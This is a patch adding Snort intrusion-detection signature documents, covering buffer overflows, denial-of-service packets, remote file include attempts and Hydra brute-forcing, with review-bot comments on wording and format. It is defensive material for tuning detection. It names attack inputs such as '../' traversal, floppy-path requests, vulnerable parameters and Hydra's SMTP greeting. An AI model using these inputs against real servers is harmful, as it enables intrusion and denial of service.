+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
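Review bot: The Attack Scenarios section is missing entirely: the file goes from Affected Systems straight to Ease of Attack, while every other doc in this patch has Attack Scenarios between them. Add it (crafted ASN.1 data delivered in an authentication exchange to a vulnerable host, as Detailed Information describes). The closing section is headed "References:" where every other file uses "Additional References:"; keep the headings uniform so anything that splits these files by section does not miss it. "Microsoft Windows 2003" in Affected Systems should be "Microsoft Windows Server 2003". Typos: "taget" should be "target", "excuted" should be "executed". The Microsoft link uses the old treeview URL form; a stable bulletin URL for MS04-007 would be more durable.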
--- /dev/null
+++ b/doc/signatures/1909.txt
@@ -0,0 +1,70 @@
+Rule:
+
+Sid:
+1909
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) Calendar
+Manager Service daemon, cmsd.
+
+--
+Impact:
+Remote root access. The attack may allow execution of arbitrary commands
+with the privileges of root.
+
+--
+Detailed Information:
+The cmsd RPC service implements the Calendar Manager Service daemon that
+is often distributed with the Common Desktop Environment (CDE) and Open
+Windows. The Calendar Manager daemon provides appointment and scheduling
+functions for CDE. A buffer overflow exists in the rtable_insert()
+function because of improper bounds checking, allowing the execution of
+arbitrary commands with the privileges of root.  One possible exploit
+vector is by inserting appointments into the Calendar Manager database.
+ 
+--
+Affected Systems:
+	SCO Open UNIX 8.0
+	SCO UnixWare 7.1.1
+	HP-UX 10.20, 10.24, 10.30, 11.0
+	Sun Solaris 2.3, 2.4, 2.5, 2.5.1, 2.6, 7.0
+	Sun SunOS 4.1.3, 4.1.4
+
+--
+Attack Scenarios:
+The attacker can use the exploit code to overflow the buffer allowing
+execution of arbitrary commands with the privileges of root.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
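Review bot: the "--" separator between "Rule:" and "Sid:" is missing at the top of this file, unlike every other signature file in the patch. "Additional References:" is left empty even though Detailed Information names the vulnerable function rtable_insert() and five affected vendors; a vendor advisory link would let readers verify the listed versions.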
--- /dev/null
+++ b/doc/signatures/1436.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1436
+
+--
+Summary:
+This event is generated when network traffic indicating the use of a
+multimedia application is detected.
+
+--
+Impact:
+This may be a violation of corporate policy since these applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation.
+
+--
+Detailed Information:
+Multimedia client applications can be used to view movies and listen to
+music files. Some also include file sharing facilities. Use of these
+programs may constitute a violation of company policy.
+
+Clients may also contain vulnerabilities that can give an attacker an
+attack vector for delivering Trojan horse programs and viruses.
+
+--
+Affected Systems:
+	All systems running multimedia applications
+
+--
+Attack Scenarios:
+A user can download files from a source external to the protected
+network that may contain malicious code hidden in the file giving an
+attacker the opportunity to gain access to a host inside the protected
+network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
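Review bot: the Corrective Action section is empty. Given what Impact and Detailed Information state (policy violation, client vulnerabilities usable to deliver Trojan horse programs), it should at least advise checking the activity against company policy and keeping the multimedia client updated with vendor patches, using the wording the other files in this patch already use.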
--- /dev/null
+++ b/doc/signatures/499.txt
@@ -0,0 +1,74 @@
+Rule:
+--
+
+Sid:
+499
+
+--
+
+Summary:
+This event is generated when a large ICMP packet is detected. Also known
+as the "Ping of Death".
+
+--
+Impact:
+Denial of Service (DoS) by system crash or bandwidth utilisation.
+
+--
+Detailed Information:
+Some implementations of the IP stack may result in a system crash 
+or may hang when a large ICMP packet is sent to them. Alternatively 
+a large number of these packets may result in link saturation, 
+especially where bandwidth is limited.
+
+This attack was prevalent a number of years ago when the TCP/IP stack of
+a number of operating systems could not handle large packet payloads.
+
+--
+Affected Systems:
+	Multiple older systems.
+
+--
+Attack Scenarios: 
+A malicious individual may send a series of large ICMP packets 
+to a host with the intention of either crashing or hanging the host, 
+or to saturate the available bandwidth.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A number of load balancing applications use 1500 byte ICMP packets to 
+determine the most efficent route to a host by measuring the latency 
+of multiple paths.
+
+HP-UX systems configured with PMTU discovery will send echo requests 
+in response to several types of network connections. PMTU Discovery 
+is enabled in HP-UX 10.30 and 11.0x by default.
+
+Windows 2000 uses large ICMP payloads to determine the speed of a link
+when utilizing a Windows domain controller.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ICMP Traffic - Seth Stein
+http://www.wfu.edu/~steinsj5/work/icmp.html
+
+--
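Review bot: the Corrective Action section is empty; with three documented false-positive sources (load balancers, HP-UX PMTU discovery, Windows 2000 link-speed probing) it should tell the reader to identify the sending host before treating the event as an attack, and to patch or replace the older IP stacks named under Affected Systems. Typos: "efficent" should be "efficient" and "unkown" should be "unknown". The "--" after "Rule:" is followed by a stray blank line, unlike the other files.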
--- /dev/null
+++ b/doc/signatures/100000131.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 
+100000131
+
+-- 
+Summary: 
+This event is generated when a request for a file residing on a floppy drive is 
+sent to the PY Software Active Webcam Server. 
+
+-- 
+
+Impact: 
+A denial of service will result, and the server will need to be manually 
+restarted.
+
+--
+Detailed Information:
+Requests for files residing on a floppy drive will cause the PY Software Active 
+Webcam Server to crash. This rule looks for requests in the form of 
+"/A:file.ext" on port 8080, the default port for this server.
+
+--
+Affected Systems:
+PY Software Active WebCam 4.3
+PY Software Active WebCam 5.5
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser or a script.
+
+-- 
+
+Ease of Attack: 
+Simple, as it can be exploited using a web browser.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Currently, there are no known workarounds or fixes.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
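Review bot: False Negatives says "None Known." but Detailed Information states the rule only inspects port 8080, the server's default; an Active Webcam Server configured on another port will not trigger it. Document this as 2557.txt does (the rule should be configured to reflect the ports in use). Several "Rule:", "Sid:" and "--" lines also carry trailing whitespace.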
--- /dev/null
+++ b/doc/signatures/100000161.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 
+100000161
+
+-- 
+Summary: 
+This event is generated when an abnormally larger number of unresolvable DNS 
+queries are generated by a particular host.
+
+--
+Impact:
+This can be an indication of a denial of service attack in progress.
+
+--
+Detailed Information:
+Since SIP systems can be overwhelmed by being forced to deal with an overly 
+large number of invalid hostnames, this rule is designed to detect such attacks 
+by searching for large volumes of DNS responses which contain the message "No 
+such name".
+
+--
+Affected Systems:
+Any which implement the SIP protocol.
+
+--
+Attack Scenarios:
+An attacker could use a script to flood a system with requests from invalid 
+hosts, causing a denial of service.
+
+--
+Ease of Attack:
+Simple, as it is trivial to write a script to generate requests with invalid 
+hostnames.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a firewall or other access-restriction device to block unwanted messages at 
+your network's border.
+
+--
+Contributors:
+Jiri Markl <jiri.markl@nextsoft.cz>
+Sourcefire Research Team
+
+--
+Additional References
+Other:
+
+--
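Review bot: Summary and Detailed Information disagree on what the rule matches: the Summary describes unresolvable DNS queries generated by a host, while Detailed Information says it searches DNS responses containing "No such name". State which direction and which message type is inspected. Grammar: "abnormally larger number" should be "abnormally large number". The final header is missing its colon ("Additional References") and is followed by an empty "Other:" label.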
--- /dev/null
+++ b/doc/signatures/2615.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2615
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "grant_surrogate_repcate" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "userid" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
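Review bot: the sentence about setting $ORACLE_PORTS to "any" on Windows is a detection caveat, not part of the vulnerability description, so it belongs under False Negatives rather than Detailed Information (2557.txt documents its port dependency under False Negatives). Attack Scenarios names a "userid" variable while Detailed Information only says "a parameter for the procedure"; make the two agree. Grammar in Summary: "a Oracle" should be "an Oracle".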
--- /dev/null
+++ b/doc/signatures/100000386.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000386
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ottoman" application running on a webserver. Access to the file "main_class.php" using a remote file being passed as the "default_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "default_path" parameter in the "main_class.php" script used by the "Ottoman" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ottoman
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
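Review bot: the file opens with two blank lines before "Rule:" and ends with a blank line after the final "--", unlike the other files in this patch. Wording: "an exploitation attempt has been attempted" is redundant (use "an exploitation attempt has been made"), "ona" should be "on a", and "attackers choosing" should be "attacker's choosing" in both places it appears.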
--- /dev/null
+++ b/doc/signatures/1837.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1837
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "alt.binaries.pictures.tinygirls".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "alt.binaries.pictures.tinygirls".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
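Review bot: the Summary is ungrammatical: "a webpage was visited the included the content" should read "a webpage was visited that included the content". Formatting: a stray blank line sits between "Sid:" and "1837", the False Negatives section has no blank line before its "--", "etc.etc." in False Positives should be dropped, and there are six blank lines before the closing "--".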
--- /dev/null
+++ b/doc/signatures/954.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+954
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
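Review bot: "attackers choosing" in Impact should be "attacker's choosing". Additional References is empty even though Detailed Information says many known vulnerabilities exist for FrontPage Server Extensions; a vendor reference would give readers somewhere to check which ones apply to their version.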
--- /dev/null
+++ b/doc/signatures/2786.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2786
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure generate_replication_package
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
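Review bot: the sentence naming the vulnerable procedure is broken so that a line begins with a period ("generate_replication_package" / ". This procedure is included in" / "dbms_repcat."); rejoin it as one sentence. Affected Systems reads "Oracle Oracle9i" (vendor name duplicated), and the Corrective Action line lacks a terminating period.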
--- /dev/null
+++ b/doc/signatures/275.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+275
+
+--
+Summary:
+This event is generated when a remote attacker transmits a malformed TCP packet to an internal server. This may indicate a "NAPTHA" Denial of Service (DoS) attack.
+
+--
+Impact:
+Denial of service.
+
+--
+Detailed Information:
+An attacker can craft a TCP packet that, when transmitted to the target server, maintains the TCP session on the target server in an unresolved state. This consumes system resources and overwhelms the target server, causing the server to stop responding to other network requests. In some cases, this type of attack can crash the target server.   
+
+--
+Affected Systems:
+Microsoft Windows 95
+Microsoft Windows 98
+Microsoft Windows 98SE
+Microsoft Windows Millennium
+Windows NT 4.0
+HP-UX 11
+IBM AIX 4.3
+Sun Solaris 7-8
+FreeBSD 4.0-REL
+Redhat Linux 6.1 - 7.0
+Other Linux operating systems based on the Linux 2.0 kernel
+
+
+--
+Attack Scenarios:
+An attacker sends a number of malformed TCP packets to a target computer. The computer attempts to maintain all incoming connections, causing it to slow down or stop responding to legitimate network requests.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Install the latest patches available for your operating system. Patches and workarounds for Microsoft are available at http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-091.asp.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+
+--
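Review bot: the Microsoft bulletin URL (MS00-091) is embedded in the Corrective Action sentence while Additional References is empty; move the URL under Additional References with a "Microsoft" label, matching the format used in the ASN.1 entry earlier in this patch, and keep Corrective Action to the patching advice. The Affected Systems list is followed by two blank lines instead of one.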
--- /dev/null
+++ b/doc/signatures/1123.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1123
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
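Review bot: "attackers choosing" in Impact should be "attacker's choosing". Several lines in the Summary, Impact and Detailed Information sections carry trailing whitespace.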
--- /dev/null
+++ b/doc/signatures/119-10.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+119-10
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This event may also constitute an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated when the http_inspect pre-processor detects the
+use of directory traversal in a web request. This may be an attempt to
+escape the web root directory or it may be an attempt to evade an IDS.
+
+--
+Affected Systems:
+	Microsoft IIS Servers
+
+--
+Attack Scenarios: 
+An attacker may supply a path to a file outside the web root by using
+"../" in the uri.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+This event may be generated if a web site uses "../" in links to other
+files on the site.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
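Review bot: Affected Systems lists only "Microsoft IIS Servers", but Detailed Information and Attack Scenarios describe a generic "../" directory traversal check performed by http_inspect on any web request; either explain why the entry is IIS-specific or broaden the list to web servers in general. There is also a stray blank line between the "--" separator and "Corrective Action:".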
--- /dev/null
+++ b/doc/signatures/1378.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1378
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a file
+globbing vulnerability associated with WU-FTPD.
+
+--
+Impact:
+Serious. Remote root access. A successful attack can allow remote
+execution of commands with privileges of WU-FTPD, most often root.
+
+--
+Detailed Information:
+An exploit in Washington University FTP daemon (WU-FTPD) code associated
+with file globbing can allow execution of arbitrary code with the
+privileges of WU-FTPD, typically root. WU-FTPD invokes the glob function
+when certain characters are used in a file name argument supplied by an
+FTP client. The glob function fails to properly handle illegal strings
+such as "~{" and "~[". The problem is compounded when the glob function
+returns an error condition that is incorrectly handled, which may lead
+to the corruption of process memory space. This exploit requires login
+access to a vulnerable server either via an anonymous or established
+user account.
+
+--
+Affected Systems:
+	WU-FTPD 2.6.1, 2.6.0, and 2.5.0.
+
+--
+Attack Scenarios:
+An attacker may login to a vulnerable WU-FTP server and enter a
+malformed file argument to gain access and execute arbitrary commands.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+Apply the appropriate vendor supplied patch.
+
+Do not enable anonymous FTP access unless required.  
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/886083
+
+--
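Review bot: "An exploit in Washington University FTP daemon (WU-FTPD) code" misuses the term; the sentence describes a vulnerability, so "A vulnerability in the Washington University FTP daemon (WU-FTPD) code associated with file globbing" reads correctly. Attack Scenarios says "WU-FTP server" where the rest of the file uses "WU-FTPD". The first Corrective Action line lacks a terminating period, and "Simple." and the last Corrective Action line carry trailing whitespace.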
--- /dev/null
+++ b/doc/signatures/100000499.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000499
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PictureDis" application running on a webserver. 
+Access to the file "thumstbl.php" using a remote file being passed as the 
+"lang" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "lang" parameter in the "thumstbl.php" script used by 
+the "PictureDis" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PictureDis
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
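Review bot: the "--" separators after the Sid, Affected Systems and Contributors sections are not preceded by a blank line, and the file ends with an extra blank line, unlike the other files in this patch. Wording: "ona" should be "on a", "attackers choosing" should be "attacker's choosing", and "an exploitation attempt has been attempted" is redundant.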
--- /dev/null
+++ b/doc/signatures/100000167.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+100000167
+
+-- 
+Summary: 
+The password-cracking tool Hydra has been detected in SMTP traffic.
+
+--
+Impact:
+An attacker may be attempting to break into one or more mail servers monitored 
+by Snort via a brute-force password attack. If successful, the attacker may 
+gain unauthorized access to internal networks.
+
+--
+Detailed Information:
+Hydra is a password-cracking tool released by a group of security experts 
+called THC, "The Hacker's Choice." When connecting to a mail server, it will 
+begin communications by sending either "HELO hydra" or "EHLO hydra", depending 
+upon the commands accepted by the remote server. Since a valid HELO or EHLO 
+command will contain the domain name of the system mail is being sent from, the 
+presence of either of these strings indicates that the Hydra tool is likely 
+being used.
+
+--
+Affected Systems:
+Any system running a mail server.
+
+--
+Attack Scenarios:
+Attackers will use the Hydra password-cracking tool.
+
+--
+Ease of Attack:
+Simple, as the program is publicly available and is well-documented.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check system logs and Snort alert logs for suspicious activity, particularly 
+unusual logons. Ensure that secure passwords are being used throughout your 
+network.
+
+--
+Contributors:
+rmkml
+Sourcefire Research Team
+
+--
+Additional References
+
+--
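Review bot: False Positives says "None known", but the rule keys on the literal strings "HELO hydra" and "EHLO hydra"; a legitimate mail client on a host actually named hydra would trigger it, and that is worth stating so analysts check the source host. The Summary line does not follow the "This event is generated when ..." form used everywhere else, and the closing "Additional References" header is missing its colon.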
--- /dev/null
+++ b/doc/signatures/693.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an SQL database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
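Review bot: the Sid field is empty; the file is 693.txt, so it should read 693. The "Affected Systems:" section present in every other file is missing. The sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit." does not fit a rule about SQL database commands and looks copied from a telnet entry; drop it or reword it for a database session. The second Corrective Action line lacks a terminating period.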
--- /dev/null
+++ b/doc/signatures/1731.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1731
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
